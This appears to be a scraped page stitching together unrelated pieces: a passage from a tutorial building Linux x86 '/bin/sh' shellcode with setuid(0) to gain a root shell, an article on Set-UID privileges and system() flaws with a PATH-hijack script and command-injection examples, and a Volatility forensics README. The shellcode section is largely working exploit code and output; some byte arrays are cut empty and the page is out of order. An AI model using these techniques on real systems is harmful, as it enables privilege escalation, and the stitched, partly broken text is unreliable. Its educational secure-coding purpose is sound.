  execve (name [0], name, NULL);

Now, it’s time to compare our program to its Assembly equivalent.

Assembly calls

We’ll use gcc and gdb to get the Assembly instructions corresponding to our small program. Let’s compile shellcode3.c with the debugging option (-g) and integrate the functions normally found in shared libraries into the program itself with the --static option. Now, we have the needed information to understand the way _exexve() and _exit() system-calls work.

$ gcc -o shellcode3 shellcode3.c -O2 -g --static

Next, with gdb, we look for our functions Assembly equivalent. This is for Linux on Intel platform (i386 and up).

$ gdb shellcode3
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions.  Type "show copying"
to see the conditions.  There is absolutely no warranty
for GDB.  Type "show warranty" for details.  This GDB was
configured as "i386-redhat-linux"...

We ask gdb to list the Assembly code, more particularly its main() function.

(gdb) disassemble main
Dump of assembler code for function main:
0x8048168 <main>:       push   %ebp
0x8048169 <main+1>:     mov    %esp,%ebp
0x804816b <main+3>:     sub    $0x8,%esp
0x804816e <main+6>:     movl   $0x0,0xfffffff8(%ebp)
0x8048175 <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x804817c <main+20>:    mov    $0x8071ea8,%edx
0x8048181 <main+25>:    mov    %edx,0xfffffff8(%ebp)
0x8048184 <main+28>:    push   $0x0
0x8048186 <main+30>:    lea    0xfffffff8(%ebp),%eax
0x8048189 <main+33>:    push   %eax
0x804818a <main+34>:    push   %edx
0x804818b <main+35>:    call   0x804d9ac <__execve>
0x8048190 <main+40>:    push   $0x0
0x8048192 <main+42>:    call   0x804d990 <_exit>
0x8048197 <main+47>:    nop
End of assembler dump.

The calls to functions at addresses 0x804818b and 0x8048192 invoke the C library subroutines holding the real system-calls. Notice the0x804817c : mov $0x8071ea8,%edx instruction fills the %edx register with a value looking like an address. Let’s examine the memory content from this address, displaying it as a string :

(gdb) printf "%s\n", 0x8071ea8

Now we know where the string is. Let’s have a look at the execve() and _exit() functions disassembling list :

(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x804d9ac <__execve>:    push   %ebp
0x804d9ad <__execve+1>:  mov    %esp,%ebp
0x804d9af <__execve+3>:  push   %edi
0x804d9b0 <__execve+4>:  push   %ebx
0x804d9b1 <__execve+5>:  mov    0x8(%ebp),%edi
0x804d9b4 <__execve+8>:  mov    $0x0,%eax
0x804d9b9 <__execve+13>: test   %eax,%eax
0x804d9bb <__execve+15>: je     0x804d9c2 <__execve+22>
0x804d9bd <__execve+17>: call   0x0
0x804d9c2 <__execve+22>: mov    0xc(%ebp),%ecx
0x804d9c5 <__execve+25>: mov    0x10(%ebp),%edx
0x804d9c8 <__execve+28>: push   %ebx
0x804d9c9 <__execve+29>: mov    %edi,%ebx
0x804d9cb <__execve+31>: mov    $0xb,%eax
0x804d9d0 <__execve+36>: int    $0x80
0x804d9d2 <__execve+38>: pop    %ebx
0x804d9d3 <__execve+39>: mov    %eax,%ebx
0x804d9d5 <__execve+41>: cmp    $0xfffff000,%ebx
0x804d9db <__execve+47>: jbe    0x804d9eb <__execve+63>
0x804d9dd <__execve+49>: call   0x8048c84 <__errno_location>
0x804d9e2 <__execve+54>: neg    %ebx
0x804d9e4 <__execve+56>: mov    %ebx,(%eax)
0x804d9e6 <__execve+58>: mov    $0xffffffff,%ebx
0x804d9eb <__execve+63>: mov    %ebx,%eax
0x804d9ed <__execve+65>: lea    0xfffffff8(%ebp),%esp
0x804d9f0 <__execve+68>: pop    %ebx
0x804d9f1 <__execve+69>: pop    %edi
0x804d9f2 <__execve+70>: leave
0x804d9f3 <__execve+71>: ret
End of assembler dump.
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x804d990 <_exit>:      mov    %ebx,%edx
0x804d992 <_exit+2>:    mov    0x4(%esp,1),%ebx
0x804d996 <_exit+6>:    mov    $0x1,%eax
0x804d99b <_exit+11>:   int    $0x80
0x804d99d <_exit+13>:   mov    %edx,%ebx
0x804d99f <_exit+15>:   cmp    $0xfffff001,%eax
0x804d9a4 <_exit+20>:   jae    0x804dd90 <__syscall_error>
End of assembler dump.
(gdb) quit

The real kernel call is done through the 0x80 interrupt, at address 0x804d9d0 for execve() and at 0x804d99b for _exit(). This entry point is common to various system-calls, so the distinction is made with the %eax register content. Concerning execve(), it has the 0x0B value, while _exit() has the0x01.

Diag. 4 : parameters of the execve() function
parameters of the execve() function

The analysis of these function’s Assembly instructions provides us with the parameters they use :

  • execve() needs various parameters (cf. diag 4) :
    • the %ebx register holds the string address representing the command to execute, “/bin/sh” in our example (0x804d9b1 : mov 0x8(%ebp),%edi followed by 0x804d9c9 : mov %edi,%ebx) ;
    • the %ecx register holds the address of the argument array (0x804d9c2 : mov 0xc(%ebp),%ecx). The first argument must be the program name and we need nothing else : an array holding the string address “/bin/sh” and a NULL pointer will be enough;
    • the %edx register holds the array address representing the program to launch the environment (0x804d9c5 : mov 0x10(%ebp),%edx). To keep our program simple, we’ll use an empty environment : that is a NULL pointer will do the trick.
  • the _exit() function ends the process, and returns an execution code to its father (usually a shell), held in the %ebx register ;

We then need the “/bin/sh” string, a pointer to this string and a NULL pointer (for the arguments since we have none and for the environment since we don’t define any). We can see a possible data representation before the execve() call. Building an array with a pointer to the /bin/shstring followed by a NULL pointer, %ebx will point to the string, %ecx to the whole array, and %edx to the second item of the array (NULL). This is shown in diag. 5.

Diag. 5 : data representation relative to registers

Locating the shellcode within memory

The shellcode is usually inserted into a vulnerable program through a command line argument, an environment variable or a typed string. Anyway, when creating the shellcode, we don’t know the address it will use. Nevertheless, we must know the “/bin/sh” string address. A small trick allows us to get it.

When calling a subroutine with the call instruction, the CPU stores the return address in the stack, that is the address immediately following this call instruction (see above). Usually, the next step is to store the stack state (especially the %ebp register with the push %ebp instruction). To get the return address when entering the subroutine, it’s enough to unstack with the pop instruction. Of course, we then store our “/bin/sh” string immediately after the call instruction to allow our “home made prolog” to provide us with the required string address. That is :

    jmp subroutine_call

    popl %esi
    (Shellcode itself)
    call subroutine

Of course, the subroutine is not a real one: either the execve() call succeeds, and the process is replaced with a shell, or it fails and the _exit()function ends the program. The %esi register gives us the “/bin/sh” string address. Then, it’s enough to build the array putting it just after the string : its first item (at %esi+8, /bin/sh length + a null byte) holds the value of the %esi register, and its second at %esi+12 a null address (32 bit). The code will look like :

    popl %esi
    movl %esi, 0x8(%esi)
    movl $0x00, 0xc(%esi)

The diagram 6 shows the data area :

Diag. 6 : data array
data area

The null bytes problem

Vulnerable functions are often string manipulation routines such as strcpy(). To insert the code into the middle of the target application, the shellcode has to be copied as a string. However, these copy routines stop as soon as they find a null character. Then, our code must not have any. Using a few tricks will prevent us from writing null bytes. For example, the instruction

    movl $0x00, 0x0c(%esi)

will be replaced with

    xorl %eax, %eax
    movl %eax, %0x0c(%esi)

This example shows the use of a null byte. However, the translation of some instructions to hexadecimal can reveal some. For example, to make the distinction between the _exit(0) system-call and others, the %eax register value is 1, as seen in the
0x804d996 <_exit+6>: mov $0x1,%eax
Converted to hexadecimal, this string becomes :

 b8 01 00 00 00          mov    $0x1,%eax

You must then avoid its use. In fact, the trick is to initialize %eax with a register value of 0 and increment it.

On the other hand, the “/bin/sh” string must end with a null byte. We can write one while creating the shellcode, but, depending on the mechanism used to insert it into a program, this null byte may not be present in the final application. It’s better to add one this way :

    /* movb only works on one byte */
    /* this instruction is equivalent to */
    /* movb %al, 0x07(%esi) */
    movb %eax, 0x07(%esi)

Building the shellcode

We now have everything to create our shellcode :

/* shellcode4.c */

int main()
  asm("jmp subroutine_call

    /* Getting /bin/sh address*/
        popl %esi
    /* Writing it as first item in the array */
        movl %esi,0x8(%esi)
    /* Writing NULL as second item in the array */
        xorl %eax,%eax
        movl %eax,0xc(%esi)
    /* Putting the null byte at the end of the string */
        movb %eax,0x7(%esi)
    /* execve() function */
        movb $0xb,%al
    /* String to execute in %ebx */
        movl %esi, %ebx
    /* Array arguments in %ecx */
        leal 0x8(%esi),%ecx
    /* Array environment in %edx */
        leal 0xc(%esi),%edx
    /* System-call */
        int  $0x80

    /* Null return code */
        xorl %ebx,%ebx
    /*  _exit() function : %eax = 1 */
        movl %ebx,%eax
        inc  %eax
    /* System-call */
        int  $0x80

        .string \"/bin/sh\"

The code is compiled with “gcc -o shellcode4 shellcode4.c“. The command “objdump --disassemble shellcode4” ensures that our binary doesn’t hold anymore null bytes :

08048398 <main>:
 8048398:   55                      pushl  %ebp
 8048399:   89 e5                   movl   %esp,%ebp
 804839b:   eb 1f                   jmp    80483bc <subroutine_call>

0804839d <subroutine>:
 804839d:   5e                      popl   %esi
 804839e:   89 76 08                movl   %esi,0x8(%esi)
 80483a1:   31 c0                   xorl   %eax,%eax
 80483a3:   89 46 0c                movb   %eax,0xc(%esi)
 80483a6:   88 46 07                movb   %al,0x7(%esi)
 80483a9:   b0 0b                   movb   $0xb,%al
 80483ab:   89 f3                   movl   %esi,%ebx
 80483ad:   8d 4e 08                leal   0x8(%esi),%ecx
 80483b0:   8d 56 0c                leal   0xc(%esi),%edx
 80483b3:   cd 80                   int    $0x80
 80483b5:   31 db                   xorl   %ebx,%ebx
 80483b7:   89 d8                   movl   %ebx,%eax
 80483b9:   40                      incl   %eax
 80483ba:   cd 80                   int    $0x80

080483bc <subroutine_call>:
 80483bc:   e8 dc ff ff ff          call   804839d <subroutine>
 80483c1:   2f                      das
 80483c2:   62 69 6e                boundl 0x6e(%ecx),%ebp
 80483c5:   2f                      das
 80483c6:   73 68                   jae    8048430 <_IO_stdin_used+0x14>
 80483c8:   00 c9                   addb   %cl,%cl
 80483ca:   c3                      ret
 80483cb:   90                      nop
 80483cc:   90                      nop
 80483cd:   90                      nop
 80483ce:   90                      nop
 80483cf:   90                      nop

The data found after the 80483c1 address doesn’t represent instructions, but the “/bin/sh” string characters (in hexadécimal, the sequence 2f 62 69 6e 2f 73 68 00) and random bytes. The code doesn’t hold any zeros, except the null character at the end of the string at 80483c8.

Now, let’s test our program :

$ ./shellcode4
Segmentation fault (core dumped)

Ooops! Not very conclusive. If we think a bit, we can see the memory area where the main() function is found (i.e. the text area mentioned at the beginning of this article) is read-only. The shellcode can not modify it. What can we do now, to test our shellcode?

To get round the read-only problem, the shellcode must be put in a data area. Let’s put it in an array declared as a global variable. We must use another trick to be able to execute the shellcode. Let’s replace the main() function return address found in the stack with the address of the array holding the shellcode. Don’t forget that the main function is a “standard” routine, called by pieces of code that the linker added. The return address is overwritten when writing the array of characters two places below the stacks first position.

  /* shellcode5.c */

  char shellcode[] =

  int main()
      int * ret;

      /* +2 will behave as a 2 words offset */
      /* (i.e. 8 bytes) to the top of the stack : */
      /*   - the first one for the reserved word for the
             local variable */
      /*   - the second one for the saved %ebp register */

      * ((int *) & ret + 2) = (int) shellcode;
      return (0);

Now, we can test our shellcode :

$ cc shellcode5.c -o shellcode5
$ ./shellcode5
bash$ exit

We can even install the shellcode5 program Set-UID root, and check the shell launched with the data handled by this program is executed under the root  identity :

$ su
# chown root.root shellcode5
# chmod +s shellcode5
# exit
$ ./shellcode5
bash# whoami
bash# exit

Generalization and last details

This shellcode is somewhat limited (well, it’s not too bad with so few bytes!). For instance, if our test program becomes :

  /* shellcode5bis.c */

 char shellcode[] =

  int main()
      int * ret;
      * ((int *) & ret + 2) = (int) shellcode;
      return (0);

we fix the process effective UID to its real UID value, as we suggested it in the previous article. This time, the shell is run without specific privileges :

$ su
# chown root.root shellcode5bis
# chmod +s shellcode5bis
# exit
$ ./shellcode5bis
bash# whoami
bash# exit

However, the seteuid(getuid()) instructions are not a very effective protection. One need only insert the setuid(0); call equivalent at the beginning of a shellcode to get the rights linked to the initial EUID for an S-UID application.

This instruction code is :

  char setuid[] =
         "\x31\xc0"       /* xorl %eax, %eax */
         "\x31\xdb"       /* xorl %ebx, %ebx */
         "\xb0\x17"       /* movb $0x17, %al */

Integrating it into our previous shellcode, our example becomes :

  /* shellcode6.c */

  char shellcode[] =
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0) */

  int main()
      int * ret;
      * ((int *) & ret + 2) = (int) shellcode;
      return (0);

Let’s check how it works :

$ su
# chown root.root shellcode6
# chmod +s shellcode6
# exit
$ ./shellcode6
bash# whoami
bash# exit

As shown in this last example, it’s possible to add functions to a shellcode, for instance, to leave the directory imposed by the chroot() function or to open a remote shell using a socket.

Such changes seem to imply you can adapt the value of some bytes in the shellcode according to their use :

eb XX <subroutine_call> XX = number of bytes to reach <subroutine_call>
5e popl %esi
89 76 XX movl %esi,XX(%esi) XX = position of the first item in the argument array (i.e. the command address). This offset is equal to the number of characters in the command, ” included.
31 c0 xorl %eax,%eax
89 46 XX movb %eax,XX(%esi) XX = position of the second item in the array, here, having a NULL value.
88 46 XX movb %al,XX(%esi) XX = position of the end of string ”.
b0 0b movb $0xb,%al
89 f3 movl %esi,%ebx
8d 4e XX leal XX(%esi),%ecx XX = offset to reach the first item in the argument array and to put it in the %ecx register
8d 56 XX leal XX(%esi),%edx XX = offset to reach the second item in the argument array and to put it in the %edx register
cd 80 int $0x80
31 db xorl %ebx,%ebx
89 d8 movl %ebx,%eax
40 incl %eax
cd 80 int $0x80
e8 XX XX XX XX call <subroutine> these 4 bytes correspond to the number of bytes to reach <subroutine> (negative number, written in little endian)


We wrote an approximately 40 byte long program and are able to run any external command as root. Our last examples show some ideas about how to smash a stack. More details on this mechanism in the next article…

Avoiding security holes when developing an application – Part 1


This article is the first one in a series about the main types of security holes in applications. We’ll show the ways to avoid them by changing your development habits a little.


It doesn’t take more than two weeks before a major application which is part of most Linux distributions presents a security hole allowing, for instance, a local user to become root. Despite the great quality of most of this software, ensuring the security of a program is a hard job : it must not allow a bad guy to benefit illegally from system resources. The availability of application source code is a good thing, much appreciated by programmers, but the smallest defects in software become visible to everyone. Furthermore, the detection of such defects comes at random and the people finding them do not always have good intentions.

From the sysadmin side, daily work consists of reading the lists concerning security problems and immediately updating the involved packages. For a programmer it can be a good lesson to try out such security problems since avoiding security holes from the beginning is the preferred method of fixing them. We’ll try to define some “classic” dangerous behaviors and provide solutions to reduce the risks. We won’t talk about network security problems since they often stem from configuration mistakes (dangerous cgi-bin scripts, …) or from system bugs allowing DOS (Denial Of Service) type attacks to prevent a machine from listening to its own clients. These problems concern the sysadmin or the kernel developers. But the application programmer must also protect her code as soon as she takes into account external data. Some versions of pine, acroread, netscape,access,… have allowed elevated access or information leaks under some conditions. As a matter of fact secure programming is everyone’s concern.

This set of articles shows methods which can be used to damage a Unix system. We could only have mentioned them or said a few words about them, but we prefer complete explanations to make people understand the risks. Thus, when debugging a program or developing your own, you’ll be able to avoid or correct these mistakes. For each discussed hole, we will take the same approach. We’ll start detailing the way it works. Next, we will show how to avoid it. For every example we will use security holes still present in wide spread software.

This first article talks about the basics needed for understanding security holes, that is the notion of privileges and the Set-UID or Set-GID bit. Next, we analyse the holes based on the system()function, since they are easier to understand.

We will often use small C programs to illustrate what we are talking about. However, the approaches mentioned in these articles are applicable to other programming languages : perl, java, shell scripts… Some security holes depend on a language, but this is not true for all of them as we will see it with system().


On a Unix system, users are not equals, neither are applications. The access to the file system nodes – and accordingly the machine peripherals – relies on a strict identity control. Some users are allowed to do sensitive operations to maintain the system in good condition. A number called UID (User Identifier) allows the identification. To make things easier, a user name corresponds to this number, the association is done in the /etc/passwd file.

The UID of 0, with default name of root, can access everything in the system. He can create, modify, remove every system node, but he can as well manage the physical configuration of the machine, mounting partitions, activating network interfaces and changing their configuration (IP address), or using system calls such as mlock() to act on physical memory, or sched_setscheduler() to change the order mechanism. In a future article we will study the Posix.1e features which allows limiting the privileges of an application executed as root, but for now, let’s assume the super-user can do everything on a machine.

The attacks we will mention are internal ones, that is an authorized user on a machine tries to gain privileges he doesn’t have. On the other hand, the network attacks are external ones, coming from people trying to connect to a machine they are not allowed on.

To use privileges reserved for another user without being able to log in under her identity, one must at least have the opportunity to talk to an application running under the victim’s UID. When an application – a process – runs under Linux, it has a well defined identity. First, a program has an attribute called RUID (Real UID) corresponding to the user ID who launched it. This data is managed by the kernel and usually can not change. A second attribute completes this information : the EUID field (Effective UID) corresponding to the identity the kernel takes into account when managing the access rights (opening files, reserved system-calls).

To get the privileges of another user means everything will be done under the UID of that user, and not under the proper UID. Of course, a cracker tries to get the root ID, but many other user accounts are of interest, either because they give access to system information (news,mail, lp…) or because they allow reading private data (mail, personal files, etc) or they can be used to hide illegal activities such as attacks on other sites.

To run an application with the privileges of an Effective UID different from its Real UID (the user who launched it) the executable file must have a specific bit turned on called Set-UID. This bit is found in the file permission attribute (like user’s execute, read, write bits, group members or others) and has the octal value of 4000. The Set-UID bit is represented with an s when displaying the rights with the ls command :

>> ls -l /bin/su
-rwsr-xr-x  1 root  root  14124 Aug 18  1999 /bin/su

The command “find / -type f -perm +4000” displays a list of the system applications having their Set-UID bit set to 1. When the kernel runs an application with the Set-UID bit on, it uses the program owner’s identity as EUID for the process. On the other hand, the RUID doesn’t change and corresponds to the user who launched the program. For instance, every user can have access to the /bin/su command, but it runs under its owner’s identity (root) with every privilege on the system. Needless to say one must be very careful when writing a program with this attribute.

Each process also has an Effective group ID, EGID, and a real identifier RGID. The Set-GID bit (2000 in octal) in the access rights of an executable file, asks the kernel to use the owner’s group of the file as EGID and not the GID of the user who launched the program. A curious combination sometimes appears with the Set-GID set to 1 but without the group execute bit. As a matter of fact, it’s a convention having nothing to do with privileges related to applications, but indicating the file can be blocked with the function fcntl(fd, F_SETLK, lock). Usually an application doesn’t use the Set-GID bit, but it does happen sometimes. Some games, for instance, use it to save the best scores into a system directory.

Type of attacks and potential targets

There are various types of attacks against a system. Today we’ll study the mechanisms to execute an external command from within and application. This is usually a shell running under the identity of the owner of the application. A second type of attack relies on buffer overflowgiving the attacker the ability to run personal code instructions. Last, the third main type of attack is based on race condition – a lapse of time between two instructions in which a system component is changed (usually a file) while the application believes it remains the same.

The two first types of attacks often try to execute a shell with the application owner’s privileges, while the third one is targeted instead at getting write access to protected system files. Read access is sometimes considered a system security weakness (personal files, emails, password file /etc/shadow, and pseudo kernel configuration files in /proc).

The targets of security attacks are mostly the programs having a Set-UID (or Set-GID) bit on. However, this also effects every application running under a different ID than the one of its user. The system daemons represent a big part of these programs. A daemon is an application usually started at boot time, running in the background without any control terminal, and doing privileged work for any user. For instance, thelpd daemon allows every user to send documents to the printer, sendmail receives and redirects electronic mail, or apmd asks the Bios for the battery status of a laptop. Some daemons are in charge of communication with external users through the network (Ftp, Http, Telnet… services). A server called inetd manages the connections of many of these services.

We can then conclude that a program can be attacked as soon as it talks – even briefly – to a user different from the one who started it. While developing this type of application you must be careful to keep in mind the risks presented by the functions we will study here.

Changing privilege levels

When an application runs with an EUID different from its RUID, it’s to provide the user with privileges he needs but doesn’t have (file access, reserved system calls…). However these privileges are only needed for a very short time, for instance when opening a file, otherwise the application is able to run with its user’s privileges. It’s possible to temporarily change an application EUID with the system-call :

  int seteuid (uid_t uid);

A process can always change its EUID value giving it the one of its RUID. In that case, the old UID is kept in a saved field called SUID (Saved UID) different from SID (Session ID) used for control terminal management. It’s always possible to get the SUID back to use it as EUID. Of course, a program having a null EUID (root) can change at will both its EUID and RUID (it’s the way /bin/su works).

To reduce the risks of attacks, it’s suggested to change the EUID and use the RUID of the users instead. When a portion of code needs privileges corresponding to those of the file’s owner, it’s possible to put the Saved UID into the EUID. Here is an example :

  uid_t e_uid_initial;
  uid_t r_uid;

  main (int argc, char * argv [])
    /* Saves the different UIDs */
    e_uid_initial = geteuid ();
    r_uid = getuid ();

    /* limits access rights to the ones of the
     * user launching the program */
    seteuid (r_uid);
    privileged_function ();

  privileged_function (void)
    /* Gets initial privileges back */
    seteuid (e_uid_initial);
    /* Portion needing privileges */
    /* Back to the rights of the runner */
    seteuid (r_uid);

This method is much more secure than the unfortunately all to common one consisting of using the initial EUID and then temporarily reducing the privileges just before doing a “risky” operation. However this privilege reduction is useless against buffer-overflow attacks. As we’ll see in a next article, these attacks intend to ask the application to execute personal instructions and can contain the system-calls needed to make the privilege level higher. Nevertheless, this approach protects from external commands and from most race conditions.

Running external commands

An application often needs to call an external system service. A well known example concerns the mail command to manage an electronic mail (running report, alarm, statistics, etc) without requiring a complex dialog with the mail system. The easiest solution is to use the library function :

  int system (const char * command)

Dangers of the system() function

This function is rather dangerous : it calls the shell to execute the command given as an argument. The shell behavior depends on the choice of the user. A typical example comes from the PATH environment variable. Let’s look at an application calling the mail function. For instance, the following program sends its source code to the user who launched it :

/* system1.c */

#include <stdio.h>
#include <stdlib.h>

main (void)
  if (system ("mail $USER < system1.c") != 0)
    perror ("system");
  return (0);

Let’s say this program is Set-UID root :

>> cc system1.c -o system1
>> su
[root] chown root.root system1
[root] chmod +s system1
[root] exit
>> ls -l system1
-rwsrwsr-x  1 root  root  11831  Oct 16  17:25 system1

To execute this program, the system runs a shell (with /bin/sh) and with the -c option, it tells it the instruction to invoke. Then the shell goes through the directory hierarchy according to the PATH environment variable to find an executable called mail. To compromise the program, the user only has to change this variable’s content before running the application. For example :

  >> export PATH=.
  >> ./system1

looks for the mail command only within the current directory. One need merely create an executable file (for instance, a script running a new shell) and name it mail and the program will then be executed with the main application owner’s EUID! Here, our script runs /bin/sh. However, since it’s executed with a redirected standard input (like the initial mail command), we must get it back in the terminal. We then create the script :

#! /bin/sh
# "mail" script running a shell
# getting its standard input back.
/bin/sh < /dev/tty

Here is the result :

>> export PATH="."
>> ./system1
bash# /usr/bin/whoami

Of course, the first solution consists in giving the full path of the program, for instance /bin/mail. Then a new problem appears : the application relies on the system installation. If /bin/mail is usually available on every system, where is GhostScript, for instance? (is it in /usr/bin, /usr/share/bin,/usr/local/bin ?). On the other hand, another type of attack becomes possible with some old shells : the use of the environment variable IFS. The shell uses it to parse the words in the command line. This variable holds the separators. The defaults are the space, the tab and the return. If the user adds the slash /, the command “/bin/mail” is understood by the shell as “bin mail“. An executable file called bin in the current directory can be executed just by setting PATH, as we have seen before, and allows to run this program with the application EUID.

Under Linux, the IFS environment variable is not a problem anymore since bash and pdksh both complete it with the default characters on startup. But keeping application portability in mind you must be aware that some systems might be less secure regarding this variable.

Some other environment variables may cause unexpected problems. For instance, the mail application allows the user to run a command while composing a message using an escape sequence “~!“. If the user writes the string “~!command” at the beginning of the line, the command is run. The program /usr/bin/suidperl used to make perl scripts work with a Set-UID bit calls /bin/mail to send a message to root when it detects a problem. Since /bin/mail is Set-UID root, the call to /bin/mail is done with root’s privileges and contains the name of the faulty file. A user can then create a file whose name contains a carriage return followed by a ~!command sequence and another carriage return. If a perl script calling suidperl fails on a low-level problem related to this file, a message is sent under the root identity, containing the escape sequence from the mail application, and the command in the file name is executed with root’s privileges.

This problem shouldn’t exist since the mail program is not supposed to accept escape sequences when run automatically (not from a terminal). Unfortunately, an undocumented feature of this application (probably left from debugging), allows the escape sequences as soon as the environment variable interactive is set. The result? A security hole easily exploitable (and widely exploited) in an application supposed to improve system security. The blame is shared. First, /bin/mail holds an undocumented option especially dangerous since it allows code execution only checking the data sent, what should be a priori suspicious for a mail utility. Second, even if the /usr/bin/suidperl developers were not aware of the interactive variable, they shouldn’t have left the execution environment as it was when calling an external command, especially when writing this program Set-UID root.

As a matter of fact, Linux ignores the Set-UID and Set-GID bit when executing scripts (read /usr/src/linux/fs/binfmt_script.c and/usr/src/linux/fs/exec.c). But some tricks allow you to bypass this rule, like Perl does with its own scripts using /usr/bin/suidperl to take these bit into account.


It isn’t always easy to find a replacement for the system() function. The first variant is to use system-calls such as execl() or execle(). However, it’ll be quite different since the external program is no longer called as a subroutine, instead the invoked command replaces the current process. You must fork the process and parse the command line arguments. Thus the program :

  if (system ("/bin/lpr -Plisting stats.txt") != 0) {
    perror ("Printing");
    return (-1);

becomes :

pid_t pid;
int   status;

if ((pid = fork()) < 0) {
  return (-1);
if (pid == 0) {
  /* child process */
  execl ("/bin/lpr", "lpr", "-Plisting", "stats.txt", NULL);
  perror ("execl");
  exit (-1);
/* father process */
waitpid (pid, & status, 0);
if ((! WIFEXITED (status)) || (WEXITSTATUS (status) != 0)) {
  perror ("Printing");
  return (-1);

Obviously, the code gets heavier! In some situations, it becomes quite complex, for instance, when you must redirect the application standard input such as in :

system ("mail root < stat.txt");

That is, the redirection defined by < is done from the shell. You can do the same, using a complicated sequence such as fork(), open(), dup2(),execl(), etc. In that case, an acceptable solution would be using the system() function, but configuring the whole environment.

Under Linux, the environment variables are stored in the form of a pointer to a table of characters : char ** environ. This table ends with NULL. The strings are of the form “NAME=value“.

We start removing the environment using the Gnu extension :

    int clearenv (void);

or forcing the pointer

    extern char ** environ;

to take the NULL value. Next the important environment variables are initialized, using controlled values, with the functions :

    int setenv (const char * name, const char * value, int remove)
    int putenv(const char *string)

before calling the system() function. For example :

    clearenv ();
    setenv ("PATH", "/bin:/usr/bin:/usr/local/bin", 1);
    setenv ("IFS", " \t\n", 1);
    system ("mail root < /tmp/msg.txt");

If needed, you can save the content of some useful variables before removing the environment (HOME, LANG, TERM, TZ,etc.). The content, the form, the size of these variables must be strictly checked. It is important that you remove the whole environment before redefining the needed variables. The suidperl security hole wouldn’t have appeared if the environment were properly removed.

Analogues, protecting a machine on a network first implies denying every connection. Next, a sysadmin activates the required or useful services . In the same way, when programming a Set-UID application the environment must be cleared and then filled with required variables.

Verifying a parameter format is done by comparing the expected value to the allowed formats. If the comparison succeeds the parameter is validated. Otherwise, it is rejected. If you run the test using a list of invalid format values, the risk of leaving a malformed value increases and that can be a disaster for the system.

We must understand what is dangerous with system() is also dangerous for some derived functions such as popen(), or with system-calls such as execlp() or execvp() taking into account the PATH variable.

Indirect execution of commands

To improve a programs usability, it’s easy to leave the user the ability to configure most of the software behavior using macros, for instance. To manage variables or generic patterns as the shell does, there is a powerful function called wordexp(). You must be very careful with it, since sending a string like $(command) allows executing the mentioned external command. Giving it the string “$(/bin/sh)” creates a Set-UID shell. To avoid this, wordexp() has an attribute called WRDE_NOCMD that deactivates the interpretation of the $( ) sequence .

When invoking external commands you must be careful to not call a utility providing an escape mechanism to a shell (like the vi :!commandsequence). It’s difficult to list them all, some applications are obvious (text editors, file managers…) others are harder to detect (as we have seen with /bin/mail) or have dangerous debugging modes.


This article illustrates various aspects :

  • Everything external to a Set-UID root program must be validated! This means the environment variables as well as the parameters given to the program (command line, configuration file…);
  • Privileges have to be reduced as soon as the program starts and should only be increased very briefly and only when absolutely necessary;
  • The “depth of security” is essential : every protection decision programs make helps reduce the number of people who can compromise them.

The next article will talk about memory, its organization, and function calls before reaching the buffer overflows. We also will see how to build a shellcode.

Volatility Framework – Volatile memory extraction utility framework

Volatility Framework - Volatile memory extraction utility framework

The Volatility Framework is a completely open collection of tools,
implemented in Python under the GNU General Public License, for the
extraction of digital artifacts from volatile memory (RAM) samples.
The extraction techniques are performed completely independent of the
system being investigated but offer visibilty into the runtime state
of the system. The framework is intended to introduce people to the
techniques and complexities associated with extracting digital artifacts
from volatile memory samples and provide a platform for further work into
this exciting area of research.

The Volatility distribution is available from:!releases/component_71401

Volatility should run on any platform that supports 
Python (

Volatility supports investigations of the following memory images:

* 32-bit Windows XP Service Pack 2 and 3
* 32-bit Windows 2003 Server Service Pack 0, 1, 2
* 32-bit Windows Vista Service Pack 0, 1, 2
* 32-bit Windows 2008 Server Service Pack 1, 2 (there is no SP0)
* 32-bit Windows 7 Service Pack 0, 1
* 32-bit Windows 8 and 8.1
* 64-bit Windows XP Service Pack 1 and 2 (there is no SP0)
* 64-bit Windows 2003 Server Service Pack 1 and 2 (there is no SP0)
* 64-bit Windows Vista Service Pack 0, 1, 2
* 64-bit Windows 2008 Server Service Pack 1 and 2 (there is no SP0)
* 64-bit Windows 2008 R2 Server Service Pack 0 and 1
* 64-bit Windows 7 Service Pack 0 and 1
* 64-bit Windows 8 and 8.1 
* 64-bit Windows Server 2012 and 2012 R2 

* 32-bit Linux kernels 2.6.11 to 3.5
* 64-bit Linux kernels 2.6.11 to 3.5
* OpenSuSE, Ubuntu, Debian, CentOS, Fedora, Mandriva, etc

Mac OSX:
* 32-bit 10.5.x Leopard (the only 64-bit 10.5 is Server, which isn't supported)
* 32-bit 10.6.x Snow Leopard
* 64-bit 10.6.x Snow Leopard
* 32-bit 10.7.x Lion
* 64-bit 10.7.x Lion
* 64-bit 10.8.x Mountain Lion (there is no 32-bit version)
* 64-bit 10.9.x Mavericks (there is no 32-bit version)

Volatility does not provide memory sample acquisition
capabilities. For acquisition, there are both free and commercial
solutions available. If you would like suggestions about suitable 
acquisition solutions, please contact us at:

volatility (at) volatilityfoundation (dot) org

Volatility supports a variety of sample file formats and the
ability to convert between these formats:

  - Raw linear sample (dd)
  - Hibernation file
  - Crash dump file
  - VirtualBox ELF64 core dump
  - VMware saved state and snapshot files
  - EWF format (E01) 
  - LiME (Linux Memory Extractor) format
  - Mach-o file format 
  - QEMU virtual machine dumps
  - Firewire 
  - HPAK (FDPro)

For a more detailed list of capabilities, see the following:

Example Data

If you want to give Volatility a try, you can download exemplar
memory images from the following url:

Mailing Lists

Mailing lists to support the users and developers of Volatility
can be found at the following address:

For information or requests, contact:

Volatility Foundation

Email: volatility (at) volatilityfoundation (dot) org

IRC: #volatility on freenode

Twitter: @volatility 

- Python 2.6 or later, but not 3.0.

Some plugins may have other requirements which can be found at:

Quick Start
1. Unpack the latest version of Volatility from
2. To see available options, run "python -h" or "python --info"


$ python --info
Volatility Foundation Volatility Framework 2.4
Usage: Volatility - A memory forensics analysis platform.

VistaSP0x64                - A Profile for Windows Vista SP0 x64
VistaSP0x86                - A Profile for Windows Vista SP0 x86
VistaSP1x64                - A Profile for Windows Vista SP1 x64
VistaSP1x86                - A Profile for Windows Vista SP1 x86
VistaSP2x64                - A Profile for Windows Vista SP2 x64
VistaSP2x86                - A Profile for Windows Vista SP2 x86
